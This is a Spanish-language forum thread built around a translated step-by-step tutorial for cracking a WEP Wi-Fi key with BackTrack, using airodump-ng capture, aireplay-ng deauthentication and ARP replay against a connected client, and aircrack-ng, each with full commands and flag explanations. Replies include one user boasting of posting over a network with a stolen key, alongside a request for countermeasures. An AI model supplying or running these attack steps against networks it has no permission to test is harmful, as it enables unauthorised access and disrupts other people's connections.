Epsilon

Como crackear una clave WEP, paso a paso. Por otro newbie usando BackTrack(traduccion).
Autor: BigDook

Original:
How to crack a WEP key, step by step. By another newbie.
Autor: BigDook
Localizacion: http://forums.remote-exploit.org/sho...?t=1556&page=1
(Nota del traductor: cuando vean NT entre paréntesis es xq viene una nota del traductor por algun motivo).


(NT: pasos previos para el completo newbie en back track
User = root
Pass = toor
Xconfig > configure la X
Startx >inicia la X
Ifconfig ath0 up >enciende la tarjeta wifi(inicia apagada por defecto en BT)


Hi

He descargado la ultima version y finalmente he descubierto como crackear una clave WEP. Voy a postear mi rutina para cualquiera que pueda tener problemas.
De paso, soy un newbie completo en Backtrack cualquier cosa relativa a Linux, pero espero cambiar eso.

OK, primero les cuento mis especificaciones. Laptop Acer (CeleronM) con una tarjeta Atheros 5005 integrada.

1. Inicia Kismet y encuentra el AP que quieres accesar, organiza los AP tecleando “S” luego “C”. Luego selecciona el AP y Enter para mostrar la información(MAC, WEP, Canal) presiona q para cerrar la pantalla de detalles y con el AP seleccionado presiona “L” en mayuscula que fija la tarjeta en ese AP.

2. Abre la consola luego entra el siguiente commando para lanzar AiroDump-ng
Que Sniffara los paquetes.

Comando: “airodump-ng –w capture –c 6 ath0”
Explicacion: airodump-ng es el software en si.
-w capture : guarda los paquetes sniffados en un archivo capture.cap
-c 6 : fija el programa en el canal 6.
Ath0 : el nombre de la tarjeta de red.

Deja esto corriendo y fijate en la MAC del AP y los paquetes y los datos en aumento(los datos son los IVs)

3. Abre otra consola para hacer que AirePlay realice un ataque DE-AUTH a una maquina especifica conectada al AP. Esto causara que la maquina especifica se desconecte y se reconecte al AP, y en este proceso causa un flujo de datos desde y hacia el AP que incluiran la clave WEP.

Comando: “aireplay-ng –e DLINK –a 00:11:22:33:44:55 –c 66:77:88:99:00:AA –deauth 10 Ath0”
Aireplay es el programa en si
-e DLINK es el nombre del SSID del AP.
–a 00:11:22:33:44:55 es la MAC del AP
–c 66:77:88:99:00:AA es la MAC del cliente conectado al AP
–deauth 10 es el tipo de ataque a realizar. En este caso deauth repetido 10 veces.
Ath0 es le nombre de la tarjeta.

Manten el comando listo pero no lo ejecutes todavía.
4. Abre otra ventana de consola, y volvemos a usar AIREPLAY, pero esta vez vamos a capturar paquetes que puedan contener algunos IVs, luego mantenerse enviando esta información y pretender ser la maquina blanco contra la cual en la otra instancia del Aireplay se realizo el ataque DEAUTH.

Comando : "aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA
ath0"

Aireplay es el programa en si
--arpreplay es la funcion de aireplay que tratamos de utilizar en este caso un replay de un request ARP, el cual contendrá IVs.
-b 00:11:22:33:44:55 es la MAC del AP
-h 66:77:88:99:00:AA MAC de la maquina blanco conectada al AP
Ath0 es el nombre de la tarjeta.

Listo ejecuta ese comando y deberias verlo buscando paquetes.

Ejecuta el comando que dejamos listo antes para iniciar el ataque DEAUTH luego cambia a la pantalla con el replay de aireplay. Deberias ver si detecta la de autentificación y desconexión de la maquina luego captura el paquete y empezar a repetirlo contra el AP aparentando ser la maquina Victima.

Vuelve a la pantalla de airodump, y CON SUERTE deberian haber muchos paquetes de datos o IVs llegando.

Puedes cerrar la pantalla del ataque DEAUTH ahora y dejar que las otras se mantengan reproduciendo el paquete hasta que creas que tienes suficientes paquetes para crackearla o sino empieza el crackeo mientras llegan mas paquetes.

5. Abre la ULTIMA pantalla de consola que sera usada para ejecutar AirCrack que escaneara los paquetes capturados por AiroDump.

Comando : "aircrack-ng -f 4 -m 00:11:22:33:44:55 -n 64 capture.cap”
aircrack-ng el nombre del programa.
-f 4 coloca el “fudgefator” en 4 (NT: factor que le indica a aircrack que tan libre puede ser al tratar nuevas claves factor de ajuste seria lo mas adecuado ) no tengo idea de que es pero aparentemente aumentarlo aumenta la posibilidad de encontrar la clave pero entre mas alto mas tardara el software.
-m 00:11:22:33:44:55 MAC del AP
-n 64 longitud de la clave puede ser tambien de 128 etc…
Capture.cap el nombre del archivo donde se guardaron los paquetes.

Ejecutalo y dependiendo de que tan rapida es tu maquina, cuantos IVs has capturado y la longitud de tu clave (64 en mi caso) BINGO! Encuentra la clave.

Probe esto en el AP de mi casa asi que sabia cual era la clave y solo utiize un laptop
Estoy seguro que me he equivocado en algunas cosas o puede hacerse de forma mas eficiente pero esto funciono para este newbie y estoy muy contento

Ojala esto le ayude a alguien.


Notas del traductor
En otras partes he visto recomendado ejecutar el ultimo punto en dos intancias de aircrak una tratando una clave de 64 y otra suponiendola de 128
markds recomienda
recomienda lanzar varios ataques al mismo archivos cambiandole algunas de las configuraciones como los valores de -f, -n y -k ).

El texto pude ser consultado en su fuente original
http://forums.remote-exploit.org/sho...?t=1556&page=1

Scripts automatizados pueden encontrarse en:
http://daouid.googlepages.com/airosc...crackingscript
http://www.forums.tisnetworks.org/in...p?showtopic=34

autor:garbagecolector

__________________

cacom2

he bien por esa ahora ya se mis errores yo que pensaba ke era el driver de la atheros ke no me funcionaba, jejeje ksi me desago de ese laptop pero weno gracias por el aporte

DragoN

Este vídeo también explica el procedimiento.

ALF

no se alguien podria aportar el listados de las tarjetas que permiten modo monitor y modo inyeccion y que son comunes en colombia o bueno faciles de conseguir.
ademas creo que si se postea esto se deberia hablar de una contramedida como para no difundir la enfermedad sino la cura tambien.
como por ejemplo autorizacion por mac address o algun tipo de vpn con autentificacion mas completa que una simple contraseña.

__________________

Epsilon

que tarjeta tienes??

aqui hay una lista

__________________

j0n!-Sn!p3r

buena info para los ke no saben o recien comienzan..

yo ahora toy escribiendo conectado a una red inalambrica con clave robada xdd

saludos!

__________________

BioVirus

muchas gracias, voy a hacer intentos.......

<offtopic>j0n!-Sn!p3r, muy bonito tu joomla!, lastima las URL's porque tienen el index.php......xD</offtopic>

__________________

j0n!-Sn!p3r

no entendi eso de ke lastima por las urls que tienen el index.php...
en todo caso ahora estoy trabajado en otro portal, este ya no existira mas.
asi ke ahora estoy en eso..
pero explikame ke es lo ke quisiste decir porfa xd

__________________

BioVirus

j0n!-Sn!p3r: http://comunidad.dragonjar.org/index.php?topic=665.0

__________________

j0n!-Sn!p3r

jejeje si.. ahora entiendo
pero de todas formas ya lo habia arreglado... Ahora veo lo de sef para continuar

saludos

__________________